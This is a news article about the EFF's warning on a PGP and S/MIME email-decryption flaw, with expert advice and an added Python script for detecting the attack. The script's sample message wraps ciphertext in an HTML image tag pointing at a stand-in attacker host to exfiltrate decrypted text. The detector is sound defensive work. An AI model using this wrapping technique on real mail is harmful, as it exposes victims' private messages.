The Electronic Frontier Foundation says people who rely on encrypted email should, for now, find another way to send and receive sensitive information.
The group cites new research warning of “serious vulnerabilities” in PGP, including GPG, and in S/MIME, the two most widely used email encryption standards.
The researchers say the flaw lets an attacker use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The weakness lies mainly in how email clients handle decrypted content: the attacker wraps the captured ciphertext in a crafted message so that, once the client decrypts it, the plaintext lands inside active content such as an HTML image reference, which the client then fetches from a server the attacker controls.
“EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now,” the group said in a statement.
A few mitigating factors
Dominic Chorafakis, principal consultant at cybersecurity consulting firm Akouto, says it's a serious issue for people who depend on encrypted email.
“There are, however, a few mitigating factors that significantly limit the scope of the issue, as far as the average consumer is concerned,” Chorafakis told ConsumerAffairs. “For one thing, the vast majority of consumers don’t use email encryption at all. The main reason is that it can be complicated to set up and isn’t supported by all email clients.”
Chorafakis says the attack is also fairly complex. The attacker must already have the encrypted message in their possession and then send a modified version back to the victim to trick the victim’s email client into exposing the decrypted content.
“Theoretically, encrypted email messages can be intercepted as they travel across the internet, but in reality that is not easy for the average hacker to do,” he said. “The most likely method an attacker might use to get their hands on a person’s encrypted email message is by hacking into their account. As a result, carrying out this attack requires a degree of tailoring and targeting, which is not something often seen on a large scale that impacts the average email user.”
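The wrapping described above leaves a trace in the structure of the message itself, so a mail gateway or a cautious user can screen for it before any client decrypts anything. The following Python script is an added example, not code from the article, from the cited research or from any vendor; it uses only the standard library. It classifies a raw message as PGP/MIME, inline PGP, S/MIME or unencrypted, and flags the case where an encrypted part sits beside an HTML part that points at a remote server, which is the shape a decrypting client would turn into an outbound request carrying the plaintext. The sample messages are constructed for the demo: the ciphertext blocks are placeholders, not real encrypted data, and attacker.example is an invented host.

```python
"""Screen raw e-mail for encrypted formats and for the HTML-wrapping pattern
that can make a client leak decrypted text (added example, stdlib only)."""
import email
import re
from email import policy
from email.message import Message
from typing import Dict, Optional

PGP_PROTOCOL = "application/pgp-encrypted"
SMIME_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime"}
INLINE_PGP = re.compile(r"^-----BEGIN PGP MESSAGE-----", re.M)
# src=/href=/url( pointing at http(s): the channel an HTML-rendering client fetches.
REMOTE_REF = re.compile(r"""(?:src|href|url\()\s*=?\s*["']?\s*https?://""", re.I)


def body_text(part: Message) -> str:
    """Decoded body of a leaf part as text (lossy decode is fine for matching)."""
    raw = part.get_payload(decode=True) or b""
    return raw.decode("utf-8", "replace")


def encryption_format(part: Message) -> Optional[str]:
    """Return 'pgp-mime', 'pgp-inline', 's/mime' or None for one MIME part."""
    ctype = part.get_content_type()
    if ctype == "multipart/encrypted" and part.get_param("protocol") == PGP_PROTOCOL:
        return "pgp-mime"
    if ctype in SMIME_TYPES:
        return "s/mime"
    if ctype == "text/plain" and INLINE_PGP.search(body_text(part)):
        return "pgp-inline"
    return None


def child_kind(part: Message) -> str:
    """Coarse label used when comparing siblings inside one container."""
    if encryption_format(part):
        return "encrypted"
    if part.get_content_type() == "text/html" and REMOTE_REF.search(body_text(part)):
        return "remote-html"
    return "other"


def analyze(raw: str) -> Dict[str, object]:
    """Report which encryption formats appear and whether an encrypted part
    shares a container with HTML that reaches out to a remote host."""
    msg = email.message_from_string(raw, policy=policy.default)
    formats = set()
    wrapped = False
    for part in msg.walk():
        fmt = encryption_format(part)
        if fmt:
            formats.add(fmt)
        # Inspect siblings in every container except the encrypted envelope itself.
        if part.is_multipart() and fmt is None:
            kinds = [child_kind(child) for child in part.get_payload()]
            if "encrypted" in kinds and "remote-html" in kinds:
                wrapped = True
    return {"formats": sorted(formats), "encrypted": bool(formats), "wrapped": wrapped}


# Constructed samples; PGP and S/MIME payloads are placeholders, not real ciphertext.
HEADERS = "From: alice@example.org\nTo: bob@example.org\nMIME-Version: 1.0\n"

ENCRYPTED_PART = """\
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="enc"

--enc
Content-Type: application/pgp-encrypted

Version: 1
--enc
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
hQEMA0nVlNvPLACEHOLDERcipher
-----END PGP MESSAGE-----
--enc--
"""

PGP_MIME_MSG = HEADERS + ENCRYPTED_PART

# The original ciphertext re-sent inside HTML that opens an image URL the
# client would complete with the decrypted text (attacker.example is invented).
WRAPPED_MSG = HEADERS + """\
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="http://attacker.example/collect?d=
--outer
""" + ENCRYPTED_PART + """\
--outer
Content-Type: text/html

">
--outer--
"""

SMIME_MSG = HEADERS + """\
Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
Content-Transfer-Encoding: base64

TUlNRSBwbGFjZWhvbGRlcg==
"""

INLINE_MSG = HEADERS + "Content-Type: text/plain\n\n-----BEGIN PGP MESSAGE-----\nhQEMplaceholder\n-----END PGP MESSAGE-----\n"
PLAIN_MSG = HEADERS + "Content-Type: text/plain\n\nSee you at 3pm.\n"

if __name__ == "__main__":
    for name, raw in [("plain", PLAIN_MSG), ("pgp-mime", PGP_MIME_MSG),
                      ("wrapped", WRAPPED_MSG), ("smime", SMIME_MSG), ("inline", INLINE_MSG)]:
        print(f"{name:9} {analyze(raw)}")
```

Run it as a script to see each sample classified; the wrapped sample is the only one reported with `wrapped: True`, while the ordinary PGP/MIME message with the same ciphertext is not. A filter like this is only a screen: it catches the obvious wrapping shape, not every variant, so the advice below to decrypt outside the client still stands.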
What to do
That said, the issue isn't one consumers should ignore. It's prudent to check whether your email client is set up for PGP or S/MIME; in most clients this shows up as an encryption plugin or as an OpenPGP or S/MIME section in the account security settings. Chorafakis says setting up either one isn't exactly simple, so if you don't remember doing it, chances are you aren't using it and have nothing to be concerned about.
If someone else set up your email client, it is worth asking them whether your system is affected.
“For individuals who are using PGP or S/MIME, the safest thing to do for now is to disable decryption in the email client until the vendor has provided a patch to mitigate the issue, and use an external program to do the encryption and decryption,” Chorafakis said.
Chorafakis is not a fan of sending sensitive data by email, no matter how secure the system is. If email has to be used, he suggests using a file encryption tool to encrypt the information and then sending the encrypted file as an attachment. The passphrase or key needed to open that file should travel by a separate channel, such as a phone call, and never in the same email.